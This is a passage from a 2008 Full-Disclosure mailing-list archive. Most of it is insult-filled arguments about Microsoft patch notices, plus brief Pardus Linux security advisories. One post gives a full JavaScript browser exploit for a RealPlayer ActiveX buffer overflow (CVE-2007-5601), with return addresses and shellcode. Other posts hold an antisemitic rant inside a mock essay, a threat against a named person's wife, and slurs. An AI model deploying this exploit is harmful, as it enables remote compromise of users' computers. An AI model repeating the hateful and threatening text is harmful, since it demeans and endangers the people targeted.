> >> >> > patches.  then, take all that data, draw some charts and graphs,
> >> >> > write
> >> >> > a whitepaper, and present it somewhere.
> >> >> >
> >> >> > u know what thats called?  research.  real ppl do it.
> >> >> >
> >> >> > u dont.  and that is why, u suck.  ta ta.
> >> >> >
> >> >> > On Thu, Nov 6, 2008 at 8:34 PM, n3td3v <xploitable at gmail.com>
> wrote:
> >> >> >> so you don't think its logical that these 5 day heads up could be
> >> >> >> helping the bad guys out? right. i think the world's biggest
> hackers
> >> >> >> could do a lot of research in 5 days. but then again n3td3v isn't
> >> >> >> logical so i must be wrong. damn those drugs eh? i just asked what
> >> >> >> the
> >> >> >> realistic possibility was for a 5 day turn around from the day of
> >> >> >> the
> >> >> >> heads up until a patch is released. i just thought it was bad that
> >> >> >> we
> >> >> >> were giving the bad guys a 5 day head start, but never mind n3td3v
> >> >> >> isn't logical so i must be wrong. scraping the 5 day head start
> >> >> >> isn't
> >> >> >> a good idea because n3td3v isn't logical? right, i threw away 10
> >> >> >> years
> >> >> >> of my life to not be logical...
> >> >> >>
> >> >> >> On Fri, Nov 7, 2008 at 1:20 AM, waveroad waveroad
> >> >> >> <waveroad at gmail.com>
> >> >> >> wrote:
> >> >> >>>
> >> >> >>> You can be ""monitoring"" the scene since 20 years if you want
> to,
> >> >> >>> it's not
> >> >> >>> for that your point will be valuable.
> >> >> >>> And actually it is not, also this is about logic.
> >> >> >>>
> >> >> >>> See you're wrong again.
> >> >> >>>
> >> >> >>> Get the fuck out of here.
> >> >> >>>
> >> >> >>>
> >> >> >>>
> >> >> >>>
> >> >> >>>
> >> >> >>>
> >> >> >>>
> >> >> >>>
> >> >> >>> 2008/11/6, n3td3v <xploitable at gmail.com>:
> >> >> >>>>
> >> >> >>>> i've been monitoring the scene since 1999 so what do you mean no
> >> >> >>>> experience? i make that about 10 years experience if my math is
> >> >> >>>> correct.
> >> >> >>>>
> >> >> >>>>
> >> >> >>>> On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee <
> biz.marqee at gmail.com>
> >> >> >>>> wrote:
> >> >> >>>> > Do you even understand why people dont like you? It is because
> >> >> >>>> > you
> >> >> >>>> > have
> >> >> >>>> > all
> >> >> >>>> > these crackpot ideas but no experience to back it up. All your
> >> >> >>>> > ideas
> >> >> >>>> > only
> >> >> >>>> > make sense from a theoretical standpoint, but in practicality
> >> >> >>>> > most
> >> >> >>>> > will
> >> >> >>>> > fail.
> >> >> >>>> >
> >> >> >>>>
> >> >> >>>> > On Fri, Nov 7, 2008 at 11:31 AM, n3td3v <xploitable at gmail.com
> >
> >> >> >>>> > wrote:
> >> >> >>>> >>
> >> >> >>>> >> blackhats like you will always hate on me, so i just ignore
> the
> >> >> >>>> >> negative responses i get.
> >> >> >>>> >
> >> >> >>>>
> >> >> >>>>
> >> >> >>>> _______________________________________________
> >> >> >>>> Full-Disclosure - We believe in it.
> >> >> >>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> >> >>>> Hosted and sponsored by Secunia - http://secunia.com/
> >> >> >>>
> >> >> >>>
> >> >> >>> _______________________________________________
> >> >> >>> Full-Disclosure - We believe in it.
> >> >> >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> >> >>> Hosted and sponsored by Secunia - http://secunia.com/
> >> >> >>>
> >> >> >>
> >> >> >> _______________________________________________
> >> >> >> Full-Disclosure - We believe in it.
> >> >> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> >> >> Hosted and sponsored by Secunia - http://secunia.com/
> >> >> >>
> >> >> >
> >> >>
> >> >> _______________________________________________
> >> >> Full-Disclosure - We believe in it.
> >> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> >> Hosted and sponsored by Secunia - http://secunia.com/
> >> >
> >> >
> >>
> >> _______________________________________________
> >> Full-Disclosure - We believe in it.
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081107/e4958767/attachment.html 

From xploitable at gmail.com  Fri Nov  7 06:05:17 2008
From: xploitable at gmail.com (n3td3v)
Date: Fri, 7 Nov 2008 06:05:17 +0000
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: <a741a45f0811062109s4527045p5e87f0395ef12c6b@mail.gmail.com>
References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com>
	<4b6ee9310811061706i11f821fdkc91c0b40b0b18400@mail.gmail.com>
	<296a304a0811061719r316bf9afufce1861c9056109b@mail.gmail.com>
	<296a304a0811061720n168da0f9j93e60724b0fdd4c1@mail.gmail.com>
	<4b6ee9310811061734o30d30ab9u99466c42267723ab@mail.gmail.com>
	<6158bb410811061744qe0d743cs5baeea649471bf40@mail.gmail.com>
	<4b6ee9310811061802r1f9ec795v64c7d72580c09eac@mail.gmail.com>
	<a741a45f0811062034u71746e8i354c0dfc673133d3@mail.gmail.com>
	<4b6ee9310811062046l5cbe5789ja60fb1efa5df0143@mail.gmail.com>
	<a741a45f0811062109s4527045p5e87f0395ef12c6b@mail.gmail.com>
Message-ID: <4b6ee9310811062205s6de5f2a6pd1264109468b1ce5@mail.gmail.com>

haha, you agree with n3td3v on something! you're making a start at
least young padawan. keep up the good work.

On Fri, Nov 7, 2008 at 5:09 AM, Biz Marqee <biz.marqee at gmail.com> wrote:
> I could care less about metasploit, all it does is help the kiddies.



From vulcanius at gmail.com  Fri Nov  7 06:00:10 2008
From: vulcanius at gmail.com (vulcanius)
Date: Fri, 7 Nov 2008 01:00:10 -0500
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: <49138E78.2030605@kallisti.se>
References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com>
	<a741a45f0811061610x560ccc9ft3e061e40f8942beb@mail.gmail.com>
	<4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com>
	<49138E78.2030605@kallisti.se>
Message-ID: <f398fbb50811062200v665eba62m751436198394f8e4@mail.gmail.com>

Probably because there's noone on his mailing list despite his claim of 5000
subscribers. Seriously n3td3v, I'd love to hear you answer as to why you
continue to troll the FD list with blatant nonsense while you have this
amazing list of 5000 some odd subscribers who all want to hear what you have
to say.

On Thu, Nov 6, 2008 at 7:40 PM, Anders B Jansson <hdw at kallisti.se> wrote:

> n3td3v wrote:
> > blackhats like you will always hate on me, so i just ignore the
> > negative responses i get.
>
> Whitehats hate you equally because you just create spam and don't post
> anything of actual value.
>
> You have your mailing list.
> Why can't you just stay there until you have anything of value to disclose?
> --
> // hdw
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081107/248e3de9/attachment.html 

From elazar at hushmail.com  Fri Nov  7 06:33:54 2008
From: elazar at hushmail.com (Elazar Broad)
Date: Fri, 07 Nov 2008 01:33:54 -0500
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
Message-ID: <20081107063354.78C1E2003F@smtp.hushmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

What scene...

On Thu, 06 Nov 2008 20:06:47 -0500 n3td3v <xploitable at gmail.com>
wrote:
>i've been monitoring the scene since 1999 so what do you mean no
>experience? i make that about 10 years experience if my math is
>correct.
>
>On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee <biz.marqee at gmail.com>
>wrote:
>> Do you even understand why people dont like you? It is because
>you have all
>> these crackpot ideas but no experience to back it up. All your
>ideas only
>> make sense from a theoretical standpoint, but in practicality
>most will
>> fail.
>>
>> On Fri, Nov 7, 2008 at 11:31 AM, n3td3v <xploitable at gmail.com>
>wrote:
>>>
>>> blackhats like you will always hate on me, so i just ignore the
>>> negative responses i get.
>>
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkkT4VIACgkQi04xwClgpZjqkQP/TCHzaFO3ngEhyXoJPlowTfzidJzg
KyzTUAiLg4AKvqxXg+TSHiIkSDQWqCmzDr0qQ5OqywMgXmbWFNZzAdZuQtf5kW4KDBLx
eclRU3VoqfSCcEMb6puLNQdnHudcVxxZk1dQQdBLlfddHRuX6sGllNkVVvtiaYPnK1U1
QxmDKXU=
=bW8c
-----END PGP SIGNATURE-----

--
Click here to find old friends, lovers or family.
http://tagline.hushmail.com/fc/Ioyw6h4fH5T0ZWneBo4QKHZMbrYp7sz9W8sLWHvULRkY7oBbDmctTq/



From colweb at gmail.com  Fri Nov  7 07:18:18 2008
From: colweb at gmail.com (Col)
Date: Fri, 7 Nov 2008 07:18:18 +0000
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: <20081107063354.78C1E2003F@smtp.hushmail.com>
References: <20081107063354.78C1E2003F@smtp.hushmail.com>
Message-ID: <1bde4ec50811062318k1f3d51d7rec374a6e7f74dce9@mail.gmail.com>

2008/11/6 n3td3v <xploitable at gmail.com>:
<snip>
> i'm not sure this is a good idea as it gives a heads up to hackers.
> you may think its not long but its actually 5 days for a hacker to
> figure out potentially a vulnerability in said area. maybe we should
> have a discussion about the pros and cons of these microsoft heads up
> and what the reality of it is for the bad guys to be able to pin point
> and start exploiting a flaw in said area in a 5 day time frame. yours
> n3td3v.

I don't think any hacker is going to bother spending 5 days looking
for a needle in a haystack when he can reverse engineer specific files
once the patch is released. I know very little of looking for pointers
in DLLs but from what I've seen it looks like a bit of a nightmare.
The best way is to "diff" two files - the un-patched and the patched
then you see where the changes are.

Of course if you had thought about it or done *any* research before
you posted you would already have made that point.

I am not a white/grey/black/pink hat I'm just an NT Admin type person
who monitors this list for Full Disclosure of bugs in software.
Instead I have trawl through your incessant ramblings on most days.
Yes I have filters set up in Gmail of course, but I still have to deal
with the replies, which before you go on about it are justifiably
offensive because you've polluted this list for years with your crap -
most have had enough of it.

Now please go and get a job in something completely different so you
can sleep through the night like the rest of us.

Regards,

Colin.



From pinar at pardus.org.tr  Fri Nov  7 07:33:12 2008
From: pinar at pardus.org.tr (=?UTF-8?B?UMSxbmFyIFlhbmFyZGHEnw==?=)
Date: Fri, 07 Nov 2008 09:33:12 +0200
Subject: [Full-disclosure] [PLSA 2008-67] libcdaudio: Buffer Overflow
Message-ID: <4913EF38.40800@pardus.org.tr>

------------------------------------------------------------------------
Pardus Linux Security Advisory 2008-67            security at pardus.org.tr
------------------------------------------------------------------------
      Date: 2008-11-07
  Severity: 2
      Type: Remote
------------------------------------------------------------------------

Summary
=======

A remotely exploitable heap-based buffer overflow detected in libcaudio. 


Description
===========

Please update your system. 


Affected packages:

  Pardus 2008:
    libcdaudio, all before 0.99.12-2-2


Resolution
==========

There are update(s) for libcdaudio. You can  update  them  via  Package 
Manager or with a single command from console: 

    pisi up libcdaudio

References
==========

  * http://bugs.pardus.org.tr/show_bug.cgi?id=8587
  * http://www.openwall.com/lists/oss-security/2008/11/05/1

------------------------------------------------------------------------

-- 
Pardus Security Team
http://security.pardus.org.tr




From pinar at pardus.org.tr  Fri Nov  7 07:27:53 2008
From: pinar at pardus.org.tr (=?UTF-8?B?UMSxbmFyIFlhbmFyZGHEnw==?=)
Date: Fri, 07 Nov 2008 09:27:53 +0200
Subject: [Full-disclosure] PLSA 2008-63] imlib2: Multiple Vulnerabilities
Message-ID: <4913EDF9.2@pardus.org.tr>

------------------------------------------------------------------------
Pardus Linux Security Advisory 2008-63            security at pardus.org.tr
------------------------------------------------------------------------
      Date: 2008-11-07
  Severity: 3
      Type: Remote
------------------------------------------------------------------------

Summary
=======

Some vulnerabilities with unknown impact have been reported in imlib2. 


Description
===========

The vulnerabilities are caused due to unspecified  errors.  No  further 
information is currently available. 



Affected packages:

  Pardus 2008:
    imlib2, all before 1.4.2-10-3


Resolution
==========

There are update(s) for imlib2. You can update them via Package Manager 
or with a single command from console: 

    pisi up imlib2

References
==========

  * http://bugs.pardus.org.tr/show_bug.cgi?id=8570
  * http://sourceforge.net/project/showfiles.php?group_id=2
  * http://secunia.com/advisories/32354/

------------------------------------------------------------------------

-- 
Pardus Security Team
http://security.pardus.org.tr




From pinar at pardus.org.tr  Fri Nov  7 07:30:48 2008
From: pinar at pardus.org.tr (=?UTF-8?B?UMSxbmFyIFlhbmFyZGHEnw==?=)
Date: Fri, 07 Nov 2008 09:30:48 +0200
Subject: [Full-disclosure] [PLSA 2008-66] Blender: Arbitrary Code Execution
Message-ID: <4913EEA8.8050106@pardus.org.tr>

------------------------------------------------------------------------
Pardus Linux Security Advisory 2008-66            security at pardus.org.tr
------------------------------------------------------------------------
      Date: 2008-11-07
  Severity: 2
      Type: Local
------------------------------------------------------------------------

Summary
=======

Untrusted search path vulnerability in BPY_interface  in  Blender  2.46 
allows local users to execute arbitrary code via a Trojan horse  Python 
file in the current working directory, related to an erroneous  setting 
of sys.path by the PySys_SetArgv function. 


Description
===========

This  vulnerability provides  administrator  access,  Allows  complete  
confidentiality,   integrity, and   availability   violation;   Allows  
unauthorized disclosure of information; Allows disruption of service. 


Affected packages:

  Pardus 2008:
    blender, all before 2.47-14-3


Resolution
==========

There are update(s) for blender. You can update them via Package Manager
or with a single command from console: 

    pisi up blender

References
==========

  * http://bugs.pardus.org.tr/show_bug.cgi?id=8579
  * http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=503632
  * http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4863

------------------------------------------------------------------------

-- 
Pardus Security Team
http://security.pardus.org.tr




From pinar at pardus.org.tr  Fri Nov  7 07:29:42 2008
From: pinar at pardus.org.tr (=?UTF-8?B?UMSxbmFyIFlhbmFyZGHEnw==?=)
Date: Fri, 07 Nov 2008 09:29:42 +0200
Subject: [Full-disclosure] [PLSA 2008-64] Dovecot: Multiple Vulnerabilities
Message-ID: <4913EE66.1020609@pardus.org.tr>

Pardus Linux Security Advisory 2008-64            security at pardus.org.tr
------------------------------------------------------------------------
      Date: 2008-11-07
  Severity: 2
      Type: Remote
------------------------------------------------------------------------

Summary
=======

The invalid message address parsing bug is pretty  important  since  it 
allows a remote user to  send  broken  mail  headers  and  prevent  the 
recipient from accessing the mailbox afterwards,  because  the  process 
will always just crash trying to parse the header. 


Description
===========

This is assuming that the IMAP client uses FETCH ENVELOPE command,  not 
all do. 


Affected packages:

  Pardus 2008:
    dovecot, all before 1.1.6-18-3


Resolution
==========

There are update(s) for dovecot. You can update them via Package Manager
or with a single command from console: 

    pisi up dovecot

References
==========

  * http://bugs.pardus.org.tr/show_bug.cgi?id=8572

------------------------------------------------------------------------

-- 
Pardus Security Team
http://security.pardus.org.tr




From gluttony at gmail.com  Fri Nov  7 08:23:44 2008
From: gluttony at gmail.com (Andrew A)
Date: Fri, 7 Nov 2008 00:23:44 -0800
Subject: [Full-disclosure] What Christianity means to me
Message-ID: <1865973b0811070023r11f4405fjabab2fb27928b392@mail.gmail.com>

I was recently having an ethics debate where someone said that Christianity
was "just what the greeks taught, but dumbed down". I heartily disagreed,
and I wanted to put my reasons to text while I still remembered them.

Christianity is the ethics of the great Greek classics, for sure. It owes
almost all its ethical lineage to those boys in limbo. There's something
deeper than that. Jesus isn't just about ethics. He's about passion, love,
and most of all, he's about being a time-traveling gangster.

I grew up poor. I know what it is like to go without food, or wear the same
pair of shoes until they smell and have holes in them. When you're poor, you
make poor friends. Let's say you and I grew up in the same trailer park. We
had this friend named Chris we met through some BBS. Chris always hung out
with the shadiest people. He knew every hooker, hustler and scammer in the
tri-state area. Despite that, Chris was the most loving, most real human
being we'd ever met. He'd sometimes feed us 10 strips of acid and take us
out to the woods to set off some explosives. He'd have our backs when the
rich kids tried to beat us up. When we were hungry, he would give us food.

Most importantly, Chris gave us a sense of justice. "Man, those fuckin'
Jews, with their media and their Federal Reserve-- they have all the money
and what do they do with it? Run this country into the ground. Try to
program every man to be a slave to behaviorism and every daughter that isn't
theirs be a whore. Things ain't right."

Chris would also give us hope. "This fuckin shithole-- this fuckin' park.
You're better than that. You're a good German kid. There's kings in your
lineage. You deserve better. Fuck anyone who says otherwise. Your parents
are assholes, your teachers are assholes, and you know what? You're an
asshole too. But you deserve better. All of you." Chris made us think there
was something important in our lives beyond the shitty trailer and the
shitty family and the mac and cheese six nights a week.

One day, Chris takes too much acid. Freaks out. Starts going into banks,
knocking shit over. "You fucking morons! You're agents of the subjugation
and slavery of your neighbors! Don't you fuckin' see! Wake the fuck up, stop
fucking ruining lives!" He breaks into the vault, burns all the money. Not
interested in a cent of it.

Chris goes to prison. After he's gone, we all realize what a difference he
made in our lives. Without Chris, the walls of our trailers seem really
small. We spend our days somber and sad. Then one day, someone says, "let's
throw a party". We all eat a little acid, and tell stories about Chris. We'd
laugh, we'd remember when our lives were more complete. And through
repeating his words about justice, truth, love and hope, we found these in
ourselves.

And we'd wait. We'd count the days. Until Chris got out of jail.

And that, my friends, is the basis of all Christianity.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081107/02c9400a/attachment.html 

From w3bd3vil at gmail.com  Fri Nov  7 08:27:03 2008
From: w3bd3vil at gmail.com (webDEViL)
Date: Fri, 7 Nov 2008 13:57:03 +0530
Subject: [Full-disclosure] CVE-2007-5601exploit
Message-ID: <8656dcd50811070027w22e1ed11vc6d0c38eadf0f549@mail.gmail.com>

Maybe this is of interest to someone....
Not tested.
This should relate to CVE-2007-5601


 <script language="javascript">

eval("function RealExploit()

{

var user = navigator.userAgent.toLowerCase();

if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)

  return;

if(user.indexOf("nt 5.")==-1)

  return;

VulObject = "IER" + "PCtl.I" + "ERP" + "Ctl.1";

try

{

  Real = new ActiveXObject(VulObject);

}catch(error)

{

  return;

}

RealVersion = Real.PlayerProperty("PRODUCTVERSION");

Padding = "";

JmpOver = unescape("%75%06%74%04");

for(i=0;i<32*148;i++)

  Padding += "S";





if(RealVersion.indexOf("6.0.14.") == -1)

{

  if(navigator.userLanguage.toLowerCase() == "zh-cn")

   ret = unescape("%7f%a5%60");

  else if(navigator.userLanguage.toLowerCase() == "en-us")

   ret = unescape("%4f%71%a4%60");

  else

   return;

}

else if(RealVersion == "6.0.14.544")

  ret = unescape("%63%11%08%60");

else if(RealVersion == "6.0.14.550")

  ret = unescape("%63%11%04%60");

else if(RealVersion == "6.0.14.552")

  ret = unescape("%79%31%01%60");

else if(RealVersion == "6.0.14.543")

  ret = unescape("%79%31%09%60");

else if(RealVersion == "6.0.14.536")

  ret = unescape("%51%11%70%63");

else

  return;







if(RealVersion.indexOf("6.0.10.") != -1)

{

  for(i=0;i<4;i++)

   Padding = Padding + JmpOver;

  Padding = Padding + ret;

}

else if(RealVersion.indexOf("6.0.11.") != -1)

{

  for(i=0;i<6;i++)

   Padding = Padding + JmpOver;

  Padding = Padding + ret;

}

else if(RealVersion.indexOf("6.0.12.") != -1)

{

  for(i=0;i<9;i++)

   Padding = Padding + JmpOver;

  Padding = Padding + ret;

}

else if(RealVersion.indexOf("6.0.14.") != -1)

{

  for(i=0;i<10;i++)

   Padding = Padding + JmpOver;

   Padding = Padding + ret;

}



AdjESP = "LLLL\\XXXXXLD";

Shell =
"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIJKBtnkSEgLnkD4vUT8fczUpVLKQfa04CHuFSJiCyqQnMFSIKtvvomnVtFHfXYbbTTHYQzkTMgsxZ3pjKHoUkyO1eJGqNlKsnQ4S3YMRFnkDL2knkQNELeSIMNkGtlKFckukspuSB2LrMrOpnTnE4RLRLS01S7JclRuVNSUt8PegpEcIPU4vcQPP0ahTLnkaP4LNkppwlNMLKSps8JKS9lKCpUdLMcpcLNkaPWLJ5OOLNbn4NjLzHNdKOyokOmS8ls4K3dltd7LIoN0lUv0MoTv4ZdoBPhhROkOKOYoLKSdWTkLLMSbNZVSYKrsbs3bzKfD0SKOjp1MOONxKNozTNm8scioKOkONcJLUTK3VLQ4qrKOxPMosNkhm2qcHhspKOkO9obrkOXPkXKg9oKO9osXsDT4pp4zvODoE4ea6NPlrLQcu71yrNcWTne3poPmTo2DDqFOprrLDnpecHQuWp";

PayLoad = Padding + AdjESP + Shell;

while(PayLoad.length < 0x8000)

  PayLoad += "YuanGe"; // ?~??~-.=!

Real.Import("c:\\Program Files\\NetMeeting\\TestSnd.wav", PayLoad,"", 0, 0);

}

RealExploit();")

</script>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081107/03fb826f/attachment.html 

From akl at experian.dk  Fri Nov  7 08:39:14 2008
From: akl at experian.dk (Anders Klixbull)
Date: Fri, 7 Nov 2008 09:39:14 +0100
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: <20081107063354.78C1E2003F@smtp.hushmail.com>
References: <20081107063354.78C1E2003F@smtp.hushmail.com>
Message-ID: <282134E75BDEB64E943CAF38C80BDD8AD3249A@PRO-EXCHANGESRV.experian.dk>

The hardcore cockgobbler scene of scotland 

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk
[mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Elazar
Broad
Sent: 7. november 2008 07:34
To: full-disclosure at lists.grok.org.uk; xploitable at gmail.com
Subject: Re: [Full-disclosure] Two bulletins from Microsoft on Patch
Tuesday

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

What scene...

On Thu, 06 Nov 2008 20:06:47 -0500 n3td3v <xploitable at gmail.com>
wrote:
>i've been monitoring the scene since 1999 so what do you mean no 
>experience? i make that about 10 years experience if my math is 
>correct.
>
>On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee <biz.marqee at gmail.com>
>wrote:
>> Do you even understand why people dont like you? It is because
>you have all
>> these crackpot ideas but no experience to back it up. All your
>ideas only
>> make sense from a theoretical standpoint, but in practicality
>most will
>> fail.
>>
>> On Fri, Nov 7, 2008 at 11:31 AM, n3td3v <xploitable at gmail.com>
>wrote:
>>>
>>> blackhats like you will always hate on me, so i just ignore the 
>>> negative responses i get.
>>
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkkT4VIACgkQi04xwClgpZjqkQP/TCHzaFO3ngEhyXoJPlowTfzidJzg
KyzTUAiLg4AKvqxXg+TSHiIkSDQWqCmzDr0qQ5OqywMgXmbWFNZzAdZuQtf5kW4KDBLx
eclRU3VoqfSCcEMb6puLNQdnHudcVxxZk1dQQdBLlfddHRuX6sGllNkVVvtiaYPnK1U1
QxmDKXU=
=bW8c
-----END PGP SIGNATURE-----

--
Click here to find old friends, lovers or family.
http://tagline.hushmail.com/fc/Ioyw6h4fH5T0ZWneBo4QKHZMbrYp7sz9W8sLWHvUL
RkY7oBbDmctTq/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



From tom.ferris.sucks at gmail.com  Fri Nov  7 09:24:41 2008
From: tom.ferris.sucks at gmail.com (ferris sucks dicks)
Date: Fri, 7 Nov 2008 01:24:41 -0800
Subject: [Full-disclosure] tom ferris learns yet another lesson once again
Message-ID: <22b776f10811070124k2f5d010bn12be760114a548a1@mail.gmail.com>

Quit trying to stalk me you fucking weirdo or I will make you look like an
even bigger idiot than you've been shown to be on numerous occasions.
Your fat mexican wife with a kid that isn't yours is also unsafe. Please
realize you are meddling in matters above your head.
Below we feature a true to life portrait of Tom Ferris, who seems to
constantly get hacked:


Adobe, ask youself, why do you employ this guy? He looks like a downs
syndrome monkey.

                __,__
       .--.  .-"     "-.  .--.
      / .. \/  .-. .-.  \/ .. \
     | |  '|  /   Y   \  |'  | |
     | \   \  \ o | o /  /   / |
      \ '- ,\.-"`` ``"-./, -' /
       `'-' /_   ^ ^   _\ '-'`
          '|  \.-----./  |   HAY GUYZ CAN U HALP ME INSTALL WORDPRESS?
           \   \ .-. /   / / I CAN'T QUITE SEEM 2 FIGURE OUT HOW TO NOT GET
OWNED
          __'._ '---' _.' WHEN THERE ARE 10 ADVISORIES OUT SAYING NOT TO USE
IT
         '      ':. ;``"``\           ` by PROFESSOR QUIT FUQN AROUND
FAGGOT, PhD, CISSP
       / '::'::'    /      ;
      |':::' '::'  /       |
      \   '::' _.-`;       ;
      /`-..--;` ;  |       |
     ;  ;  ;  ;  ; |       |
    ; ;  ;  ; ;  ;        /        ,--........,,
    |; ;  ;  ;  ;/       ;       .'           -='.
    | ;  ;  ; ; /       / ))    .\               :
    |  ;   ;  /`      .\   _,=="  \             .'
    \;  ; ; .'. _  ,_'\.\~"   //`. \          .'
    |  ;  .___~' \ \- | |    /,\ `  \      _.'
  ~ ; ; ;/  _,.-~'|`| | |       _,-''\..--'
  ~ /; ;/=""      |`| |`|    _="`
  ~..==`     \\   |`| / /_="`
   ~` ~      /,\ / /_,)")
   ~ ~~       _,.-)")
  ~ ~   _,=~"|
  ~  =~"|;  ;|       Tomferrisbird
   ~  ~ | ;  |       =============
~ ~     |;|\ |
        |/  \|



fuck off buddy
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081107/4e5c2c21/attachment.html 

From xploitable at gmail.com  Fri Nov  7 09:43:54 2008
From: xploitable at gmail.com (n3td3v)
Date: Fri, 7 Nov 2008 09:43:54 +0000
Subject: [Full-disclosure] Fwd: How are you securing your Wireless Networks?
In-Reply-To: <4b6ee9310811070136m5b60177eo16aad5433d5948a2@mail.gmail.com>
References: <4b6ee9310811070136m5b60177eo16aad5433d5948a2@mail.gmail.com>
Message-ID: <4b6ee9310811070143p29d32a24u116c08af70258e89@mail.gmail.com>

---------- Forwarded message ----------
From: n3td3v <xploitable at gmail.com>
Date: Fri, Nov 7, 2008 at 9:36 AM
Subject: re:How are you securing your Wireless Networks?
To: handlers at sans.org


good poll you have doing this, not only do you gain intelligence about
your readership, but you have a bunch of ip addresses logged with
their respective answers about their wireless posture. answering such
a poll could be a security vulnerability in its self but there is no
security through obscurity though right? 675 ip addresses so far have
been dumb asses and answered your poll. keep up the good work or not
as the case may be. to be frank the question is none of your business,
but if people are stupid enough to answer it then why the hell not. i
don't know if its a good trend to have folks asking those types of
questions over the internet and have people answer them, the bad guys
could leverage a way to exploit such a trend and isc shouldn't be
setting up a trend where such questions are asked. its like saying to
folks, nobody will ever ask you what your password is via email, and
then you setting up a poll asking people what their password is. yeah
it really is as dumb as that, but carry on polls of this nature if you
think its the right standard to be setting by asking these types of
questions over an internet connection where anything or anyone could
be electronically capturing the answers, the ip addresses and other
information as it flies through the air. good day isc, don't take it
personally now, this email is to isc not any individual, so don't come
replying with narky comments or do a joel esler by posting the email
to internet relay chat and complaining how rude i've been when sending
an email to handlers at sans and taking it personally as if the email was
personally addressesd to you when it wasn't. damn, you would think
joel esler would have known already not to take emails personally that
are sent to an organisations email address, but yeah well he paid the
price by doing so because i put all his dirty washing out to dry on
full-disclosure. take cares isc.



From nytrokiss at gmail.com  Fri Nov  7 09:53:02 2008
From: nytrokiss at gmail.com (James Matthews)
Date: Fri, 7 Nov 2008 11:53:02 +0200
Subject: [Full-disclosure] Fwd: 0day auctions, should they be outlawed?
In-Reply-To: <197321660811031351pdfa5371y121bebb8b8c7396e@mail.gmail.com>
References: <197321660811031351pdfa5371y121bebb8b8c7396e@mail.gmail.com>
Message-ID: <8a6b8e350811070153u4beb86faw5148e3526e9d4d20@mail.gmail.com>

OT i really like the name you put up. Gmail asked me if i wanted to " Invite
some guy posting to full disclosure to chat"

On Mon, Nov 3, 2008 at 11:51 PM, Some Guy Posting To Full Disclosure <
fd.leach at googlemail.com> wrote:

> It's futile trying to use the law to change things.
> It will simply force people into the shadows. Which today involves
> using tor and some Russian web money account.
>
> I read a slogan from before my time, in a book: "If source is outlawed
> outlaws will have source" - same applies to zero days.
>
> Anyway I don't think it should be Illegal. I own a set of lock picks -
> I don't intend to break into someone's house. And if I did I'd go to
> jail (for the burglary and being equipped with picks), untill then I'm
> innocent. The UKs law has an attitude like that - I like it!
> Resources should go into actually preventing crimes taking place. Not
> stumbling around hoping that making it awkward for criminals to get
> the tools they need will make a difference.
>
> Simon.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081107/59edd6c8/attachment.html 

From nytrokiss at gmail.com  Fri Nov  7 09:55:29 2008
From: nytrokiss at gmail.com (James Matthews)
